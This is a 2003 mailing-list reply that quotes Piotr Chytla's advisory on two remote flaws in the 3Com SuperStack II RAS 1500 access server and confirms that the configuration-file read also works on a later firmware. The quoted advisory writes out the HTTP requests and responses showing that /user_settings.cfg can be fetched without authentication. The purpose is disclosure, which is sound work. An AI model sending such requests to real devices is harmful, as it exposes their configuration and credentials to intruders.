Hi Piotr Chytla >Synopsis: 3com RAS 1500 Remote vulnerabilities. >Product: 3C433279A-US http://www.3com/ras1500 >Version: Firmware X2.0.10 > >URL: http://isec.pl/vulnerabilities/isec-0009-3com-ras.txt >Author: Piotr Chytla <pch@isec.pl> >Date: February 27, 2003 > > I tested second bug on SuperStack II Remote Access System 1500, Version: 2.5.0, 159, and working... >Issue: >- ------ > > 3com SuperStack II Remote Access System 1500 is telco device which > provides access via BRI-ISDN/Analog to dialin users. > It contains two remote vulnerabilities, first is Denial Of Service that > leads to system crash, second can be used to read configuration files. > >2. Configuration file read > > Unauthorized user can read configuration and system files, using web > interface on RAS 1500 . > > GET /download.htm HTTP/1.0 > HTTP/1.0 401 Unauthorized > WWW-Authenticate: Basic realm="RAS1500" > Content-Type: text/html > Server: Allegro-Software-RomPager/2.10 > > GET /user_settings.cfg HTTP/1.0 > HTTP/1.0 200 OK > Content-Type: multipart > Date: Mon, 25 May 1998 00:26:38 GMT > Last-Modified: Tue, 01 Jan 1901 00:00:01 GMT > Content-Length: 1258 > Server: Allegro-Software-RomPager/2.10 > [..] content of user_setting.cfg -- Best regards, Jan Kachlik jkachlik@isgroup.com +---------------------------------+ ' Kachlik Jan ' ' Security & Network Specialist ' ' InterSource Solutions Group ' ' Mathonova 25, 613 00 Brno CZ ' ' Mail: jkachlik@isgroup.com ' ' Mail: jkachlik@hacktrack.com ' ' GSM: +420.728.662.807 ' ' ICQ: #56618470 ' ' WebSite: http://www.isgroup.com ' +---------------------------------+
